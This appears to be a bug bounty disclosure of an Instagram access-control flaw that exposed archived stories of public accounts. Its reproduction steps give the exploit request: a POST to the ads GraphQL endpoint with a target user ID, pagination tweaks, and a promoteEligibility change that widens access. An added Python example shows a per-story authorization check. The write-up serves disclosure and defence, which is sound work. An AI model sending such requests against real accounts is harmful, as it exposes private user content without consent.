All archived stories of any Business/Creator/Public Instagram account can be disclosed by using the IG user ID.
Impact
Archived stories can only be viewed by the story owner/creator or a branded content partner (added to the story), but an attacker was able to view almost all archived stories of any public IG user.
Reproduction Steps
Send a POST request to i.instagram.com/api/v1/ads/graphql/ with parameters:
doc_id=3271888XXXXXXXXX&query_params={"count":15,"cursor":"0","timeframe":"LIFETIME","searchBase":"USER","promoteEligibility":"ELIGIBLE","trackingCondition":"CREATED_BEFORE_TRACKING_INCLUDED","is_user":"true","queryParams":{"access_token":"","id":"USER_ID"}}
Where USER_ID is the user ID of the targeted IG account (it can be obtained by using instagram.com/[username]/?__a=1).
Change the cursor value for navigation (or set the count value to a large number).
timeframe can be weekly, monthly, yearly or lifetime.
By changing promoteEligibility to ALL, an attacker can access all ineligible and eligible (for promotion) stories.
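A server-side check that would refuse the request above, shown as an added example and not Instagram's code or the fix that was shipped. It assumes the cause was a missing per-story authorization check; ArchivedStory, may_view, list_archived_stories, MAX_COUNT and the sample IDs are hypothetical.

```python
from dataclasses import dataclass

MAX_COUNT = 50  # assumed server-side ceiling on page size

class Forbidden(Exception):
    """Raised when the session user may not read the requested archive."""

@dataclass(frozen=True)
class ArchivedStory:
    story_id: int
    owner_id: str
    promote_eligible: bool
    branded_partners: frozenset = frozenset()

def may_view(viewer_id, story):
    # Rule from the Impact section: owner, or a branded content partner
    # added to this particular story.
    return viewer_id == story.owner_id or viewer_id in story.branded_partners

def list_archived_stories(session_user_id, query_params, store):
    """Hypothetical resolver: authority comes from the session, never from
    the client-supplied queryParams.id, which only selects whose archive."""
    if not session_user_id:
        raise Forbidden("no authenticated session")
    target_id = str(query_params["queryParams"]["id"])
    count = max(1, min(int(query_params.get("count", 15)), MAX_COUNT))
    cursor = max(0, int(query_params.get("cursor", 0)))
    include_all = query_params.get("promoteEligibility") == "ALL"
    visible = [s for s in store
               if s.owner_id == target_id
               and may_view(session_user_id, s)       # per-object check
               and (include_all or s.promote_eligible)]
    if session_user_id != target_id and not visible:
        raise Forbidden("no readable stories in this archive")
    return visible[cursor:cursor + count]

# Constructed sample data: user 1001 owns three archived stories, and
# user 2002 is a branded content partner on story 12 only.
SAMPLE_STORE = [
    ArchivedStory(11, "1001", True),
    ArchivedStory(12, "1001", True, frozenset({"2002"})),
    ArchivedStory(13, "1001", False),
]

def request_for(user_id, **overrides):
    # Same parameter shape as the request in the reproduction steps.
    params = {"count": 15, "cursor": "0", "promoteEligibility": "ELIGIBLE",
              "queryParams": {"access_token": "", "id": user_id}}
    params.update(overrides)
    return params
```

The count clamp matters independently of the access check: without it, a single request with a large count returns the whole archive in one response.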
Timeline
25 August 2021: Bounty Awarded